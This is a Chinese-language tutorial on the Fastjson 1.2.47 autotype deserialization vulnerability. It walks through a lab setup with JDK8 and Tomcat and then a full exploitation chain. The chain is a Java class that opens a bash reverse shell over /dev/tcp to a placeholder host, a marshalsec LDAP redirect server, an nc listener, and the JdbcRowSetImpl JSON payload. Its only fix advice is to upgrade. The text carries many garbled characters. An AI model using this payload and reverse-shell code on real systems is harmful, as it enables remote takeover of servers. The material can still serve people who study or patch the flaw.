如何實現Fastjson漏洞分析
本篇文章給大家分享的是有關如何實現Fastjson漏洞分析����,小編覺得挺實用的�����,因此分享給大家學習�����,希望大家閱讀完這篇文章后可以有所收獲����,話不多說�����,跟著小編一起來看看吧��。
0x01簡介
fastjson 是阿里巴巴的開源JSON解析庫�����,它可以解析 JSON 格式的字符串����,支持將 Java Bean 序列化為 JSON 字符串�,也可以從 JSON 字符串反序列化到 JavaBean��。
FastJson特點如下:
(1)能夠支持將java bean序列化成JSON字符串���,也能夠將JSON字符串反序列化成Java bean����。
(2)顧名思義���,FastJson操作JSON的速度是非?���?斓?��。
(3)無其他包的依賴�。
(4)使用比較方便��。
0x02漏洞介紹
Fastjson提供了autotype功能��,允許用戶在反序列化數據中通過“@type”指定反序列化的類型��,Fastjson自定義的反序列化機制時會調用指定類中的setter方法及部分getter方法���,那么當組件開啟了autotype功能并且反序列化不可信數據時�����,攻擊者可以構造數據����,使目標應用的代碼執行流程進入特定類的特定setter或者getter方法中���,若指定類的指定方法中有可被惡意利用的邏輯(也就是通常所指的“Gadget”)��,則會造成一些嚴重的安全問題�����。并且在Fastjson 1.2.47及以下版本中���,利用其緩存機制可實現對未開啟autotype功能的繞過����。
0x03影響版本
Fastjson <= 1.2.47
0x04環境搭建
虛擬機:centos7
所需環境:jdk8
JDK8下載地址:https://pan.baidu.com/s/1nuxQJkYwkY2UOaPEIshQig 提取碼:lc0i
Tomcat
Tomcat下載地址:https://mirrors.tuna.tsinghua.edu.cn/apache/tomcat/tomcat-9/v9.0.36/bin/
Fastjson1.2.47
Fastjson1.2.47下載地址:鏈接:https://pan.baidu.com/s/1D0gDc3NGXlHQ2Yamy4zHtQ 提取碼:ps2p
本地搭建Tomcat
1���、安裝jdk8并配置環境變量
首先在usr目錄下創建一個java的目錄
mkdir /usr/java
2��、將下載好的jdk8的安裝包放在usr/java目錄下����,使用tar解壓���,mv重命名
tar zxvf jdk-8u141-linux-x64.tar
mv jdk-8u141-linux-x64.tar/ jdk8 //重命名為jdk8
3�����、配置系統環境變量�����,使用vim編輯profile文件
vim /etc/profile 在最后一行加上一下代碼
export JAVA_HOME=/usr/java/jdk8
export CLASSPATH=.:$JAVA_HOME/jre/lib/rt.jar:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar
export PATH=$PATH:$JAVA_HOME/bin
保存后使用java -version 查看是否配置成功
Java環境安裝好����,再來安裝Tomcat
把Tomcat傳上Centos7上��,使用tar zxvf apache-tomcat-9.0.36.tar.gz解壓
使用命令重命名tomcat
mv apache-tomcat-9.0.27 tomcat9 //重命名為tomcat9
授予tomcat9這個文件夾為777權限
chmod 777 tomcat9/
把tomcat的加入到環境變量
vim /etc/profile
export CATALINA_HOME=/tomcat9 //存放tomcat的目錄
應用環境變量
source /etc/profile
啟動tomcat�����,進入tomcat9下的bin目錄
cd tomcat9/bin
sudo ./catalina.sh start //啟動tomcat
瀏覽器訪問http://ip:8080 查看
復制fastjson1.2.47到webapps文件夾下��,解壓�����,訪問出現hello word環境即搭建成功
0x05漏洞利用
1��、編譯生成Exploit.class
首先將以下代碼保存為Exploit.java�����,反彈shell命令在代碼內�,可自行更改
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/xx.xx.xx.xx/1888;cat <&5 | while read line; do $line 2>&5 >&5; done"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}然后編譯Exploit.java���,會生成一個Exploit.class文件
javac Exploit.java
2.開啟3個監聽窗口
第一個使用python3開啟一個臨時服務���,然后把編譯好的Exploit.class文件放至web目錄下��,使瀏覽器訪問會下載
python -m http.server 8000
注:此步是為了接收LDAP服務重定向請求�����,需要在payload的目錄下開啟此web服務����,這樣才可以訪問到payload文件
第二個服務器使用剛才下載的工具marshalsec開啟LDAP服務監聽:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.10.106:8000/#Exploit 6666
注:使用marshalsec工具快捷的開啟LDAP服務��,借助LDAP服務將LDAP reference result 重定向到web服務器
第3個�,開啟nc監聽設定的端口
Nc -lvnp 4444
訪問fastjson頁面使用Burp抓包����,構造數據包修改為POST請求���,使用EXP
{
"name":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"x":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://ip:9999/Exploit",
"autoCommit":true
}
}發送后可以看到nc監聽窗口成功得到shell
0x06修復方式
將Fastjson升級到最新版本
以上就是如何實現Fastjson漏洞分析��,小編相信有部分知識點可能是我們日常工作會見到或用到的���。希望你能通過這篇文章學到更多知識�����。更多詳情敬請關注億速云行業資訊頻道��。
